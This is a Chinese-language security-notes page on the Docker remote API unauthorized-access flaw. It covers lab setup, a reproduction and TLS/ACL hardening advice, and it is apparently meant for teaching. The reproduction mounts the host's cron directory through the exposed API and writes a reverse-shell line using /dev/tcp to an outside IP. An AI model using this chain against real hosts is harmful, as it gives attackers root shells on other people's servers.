> For the complete documentation index, see [llms.txt](https://icybersec.gitbook.io/cybersecuritynote/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://icybersec.gitbook.io/cybersecuritynote/an-quan-lou-dong/wei-shou-quan-lou-dong/docker-wei-shou-quan-fang-wen-lou-dong.md). # Docker未授权访问漏洞 ## 漏洞描述 恶意攻击者可以在未经授权的情况下访问 Docker 服务器或容器。这可能导致敏感数据泄露,或允许攻击者执行未经授权的操作,如添加、修改或删除容器。 ## 环境搭建 安装docker ``` yum install -y docker ``` 修改`/usr/lib/systemd/system/docker.service`服务,启动API接口。 ``` ExecStart=/usr/local/bin/dockerd -H tcp://0.0.0.0:2375 -H unix://var/run/docker.sock ``` ![image-20220726104747298](/files/1Umfabj7XbGcgW1F2tJQ) 重启docker服务。 ``` systemctl daemon-reload systemctl restart docker ``` ![image-20220726104829456](/files/yw4V4eXderVGTKDmlUBM) ## 漏洞复现 输入`ip:2375/version`就会列出基本信息,和docker version命令效果一样。 ![image-20220726104904921](/files/nqUnyZQfJIdI15ct6ZnU) **利用docker容器写定时任务反弹shell** 我们可以利用未授权访问的docker remote api 开启一个容器并挂载至根目录,由此我们可以获得任意读写的权限,然后我们再将反弹shell命令写入定时任务crontab中,即可使宿主机反弹shell。 ``` [root@localhost ~]# docker -H tcp://192.168.32.183:2375 run -it --user root --privileged -v /var/spool/cron/:/var/spool/cron/ alpine sh ``` 写入定时计划 ``` / # echo '* * * * * bash -i >& /dev/tcp/192.168.32.130/8088 0>&1' >> /var/spool/cron/root ``` ![image-20220726110359885](/files/CAFGcudfhf7aX5wG7QUT) ## 安全加固 在不必需的情况下,不要启用docker的remote api服务,如果必须使用的话,可以采用如下的加固方式: ``` 设置ACL,仅允许信任的来源IP连接; 设置TLS认证,官方的文档为Protect the Docker daemon socket ``` 客户端与服务器端通讯的证书生成后,可以通过以下命令启动docker daemon: ``` docker -d --tlsverify --tlscacert=ca.pem --tlscert=server-cert.pem --tlskey=server-key.pem -H=tcp://10.10.10.10:2375 -H unix:///var/run/docker.sock ``` 客户端连接时需要设置以下环境变量 ``` export DOCKER_TLS_VERIFY=1 export DOCKER_CERT_PATH=~/.docker export DOCKER_HOST=tcp://10.10.10.10:2375 export DOCKER_API_VERSION=1.12 ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://icybersec.gitbook.io/cybersecuritynote/an-quan-lou-dong/wei-shou-quan-lou-dong/docker-wei-shou-quan-fang-wen-lou-dong.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.